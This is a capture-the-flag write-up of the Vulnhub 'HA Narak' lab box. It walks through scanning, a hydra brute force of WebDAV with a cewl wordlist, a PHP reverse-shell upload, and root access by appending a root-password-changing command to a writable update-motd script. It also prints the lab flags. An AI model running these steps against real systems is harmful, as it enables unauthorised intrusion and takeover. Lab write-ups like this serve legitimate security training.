Vulnhub - HA Narak

Posted on | In
My writeup on HA Narak box.

You can find the machine there > HA Narak

Summary

This was a pretty interesting box, we start off by generating a wordlist using cewl and then brute force webdav this will give us shell as www-data. We find a bash script with brainfuck langauge in it we decode it and we get inferno password. Privesc to root is MOTD exploitation. Let’s pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
 
$ ip=192.168.1.16
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:53 EEST
Nmap scan report for ubuntu.zte.com.cn (192.168.1.16)
Host is up (0.00019s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:04:4D:75 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds
$ nmap -p 22,80 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:53 EEST
Nmap scan report for ubuntu.zte.com.cn (192.168.1.16)
Host is up (0.00054s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 71:bd:59:2d:22:1e:b3:6b:4f:06:bf:83:e1:cc:92:43 (RSA)
|   256 f8:ec:45:84:7f:29:33:b2:8d:fc:7d:07:28:93:31:b0 (ECDSA)
|_  256 d0:94:36:96:04:80:33:10:40:68:32:21:cb:ae:68:f9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA: NARAK

Let’s start the enumeration on port 80 with a gobuster scan:

1
2
3
4
5
6
 
$ gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html
/images (Status: 301)
/index.html (Status: 200)
/tips.txt (Status: 200)
/webdav (Status: 401)
/server-status (Status: 403)

/tips.txt says this message: Hint to open the door of narak can be found in creds.txt. probably this will be useful later on privesc because now there is no creds.txt

/webdav asks for creds:

Because i have experience with HA series their boxes require cewl lot of times, so let’s generate a custom wordlist with cewl and do a brute force with hydra:

1
2
3
4
5
6
7
 
$ cewl http://$ip/ -w wordlist.txt
$ hydra -L wordlist.txt -P wordlist.txt $ip http-get /webdav

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-29 11:33:50
[DATA] max 16 tasks per 1 server, overall 16 tasks, 6724 login tries (l:82/p:82), ~421 tries per task
[DATA] attacking http-get://192.168.1.16:80/webdav
[80][http-get] host: 192.168.1.16   login: yamdoot   password: Swarg

Shell as www-data

Perfect, a few words about the webdav.

WebDAV is an extension of the HTTP protocol that allow users to upload,download files on the apache server. I always like to use Cadaver as WebDAV client. Let’s login and upload our shell.

1
2
3
4
5
6
7
8
9
 
$ cadaver http://$ip/webdav
Authentication required for webdav on server `192.168.1.16':
Username: yamdoot
Password: 
dav:/webdav/> put shell.php
Uploading shell.php to `/webdav/shell.php':
Progress: [=============================>] 100.0% of 5494 bytes succeeded.
dav:/webdav/> exit
Connection to `192.168.1.16' closed.

Let’s execute it and get shell:

1
 
$ curl --digest --user 'yamdoot:Swarg' http://$ip/webdav/shell.php

1
2
3
4
5
6
7
 
$ nc -lvp 5555                                                  
listening on [any] 5555 ...

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as inferno

Let’s search now the for creds.txt file:

1
2
 
www-data@ubuntu:/$ find / -name "creds.txt" 2>/dev/null
/mnt/karma/creds.txt

If we base64 decoded we can see the creds we found before:

1
2
 
www-data@ubuntu:/$ base64 -d /mnt/karma/creds.txt
yamdoot:Swarg

If we move now to /mnt we can find a bash script with brainfuck language in:

1
2
3
4
5
 
www-data@ubuntu:/mnt$ cat hell.sh
#!/bin/bash

echo"Highway to Hell";
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

Brainfuck is an esoteric programming language, let’s use this decoder & we got a password! chitragupt This password works with user inferno we can use SSH now to login in.

1
2
3
4
5
 
$ ssh inferno@$ip

inferno@ubuntu:~$ whoami;id
inferno
uid=1002(inferno) gid=1002(inferno) groups=1002(inferno)

Shell as root

Under .cache folder i found a motd file, that’s a hint for privesc:

1
2
3
4
5
6
 
inferno@ubuntu:~$ cd .cache/
inferno@ubuntu:~/.cache$ ls -la
total 8
drwx------ 2 inferno inferno 4096 Sep 29 01:59 .
drwxr-xr-x 3 inferno inferno 4096 Sep 29 01:59 ..
-rw-r--r-- 1 inferno inferno    0 Sep 29 01:59 motd.legal-displayed

If we go to update-motd.d directory we can see that all files are writable. So let’s simply add a command that changes root password & login in again.

1
2
3
4
5
6
7
8
9
10
11
 
inferno@ubuntu:~/.cache$ cd /etc/update-motd.d/
inferno@ubuntu:/etc/update-motd.d$ ls -la
total 36
drwxrwxrwx  2 root root 4096 Sep 21 09:57 .
drwxr-xr-x 80 root root 4096 Sep 22 05:14 ..
-rwxrwxrwx  1 root root 1220 Apr  9  2018 00-header
-rwxrwxrwx  1 root root 1157 Apr  9  2018 10-help-text
-rwxrwxrwx  1 root root 4251 Apr  9  2018 50-motd-news
-rwxrwxrwx  1 root root  604 Mar 21  2018 80-esm
-rwxrwxrwx  1 root root 3017 Mar 21  2018 80-livepatch
-rwxrwxrwx  1 root root  299 May 18  2017 91-release-upgrade

1
2
3
4
5
6
7
8
9
10
11
 
inferno@ubuntu:/etc/update-motd.d$ echo "echo 'root:pwned' | sudo chpasswd" >> 00-header 
inferno@ubuntu:/etc/update-motd.d$ exit
logout
Connection to 192.168.1.16 closed.
$ ssh inferno@$ip

inferno@ubuntu:~$ su - root
Password: 
root@ubuntu:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read that flags:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 
root@ubuntu:~# cat root.txt 
██████████████████████████████████████████████████████████████████████████████████████████
█░░░░░░██████████░░░░░░█░░░░░░░░░░░░░░█░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░█░░░░░░██░░░░░░░░█
█░░▄▀░░░░░░░░░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░▄▀▄▀▄▀▄▀▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░░░░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░████░░▄▀░░███░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░░░▄▀░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀▄▀░░███░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀▄▀▄▀▄▀▄▀░░███
█░░▄▀░░██░░▄▀░░██░░▄▀░░█░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░░░███░░▄▀░░░░░░▄▀░░█░░▄▀░░░░░░▄▀░░███
█░░▄▀░░██░░▄▀░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░█████░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░███
█░░▄▀░░██░░▄▀▄▀▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀░░░░█
█░░▄▀░░██░░░░░░░░░░▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀▄▀░░█░░▄▀░░██░░▄▀░░█░░▄▀░░██░░▄▀▄▀░░█
█░░░░░░██████████░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░░░█░░░░░░██░░░░░░█░░░░░░██░░░░░░░░█
██████████████████████████████████████████████████████████████████████████████████████████
                           
                                                                                    
Root Flag: {9440aee508b6215995219c58c8ba4b45}						

!! Congrats you have finished this task !!
							
Contact us here:					
								
Hacking Articles : https://twitter.com/hackinarticles

Jeenali Kothari  : https://www.linkedin.com/in/jeenali-kothari/	
																
+-+-+-+-+-+ +-+-+-+-+-+-+-+					
 |E|n|j|o|y| |H|A|C|K|I|N|G|			
 +-+-+-+-+-+ +-+-+-+-+-+-+-+						
__________________________________

root@ubuntu:~# cat /home/inferno/user.txt 
Flag: {5f95bf06ce19af69bfa5e53f797ce6e2}

Awesome box! :smile: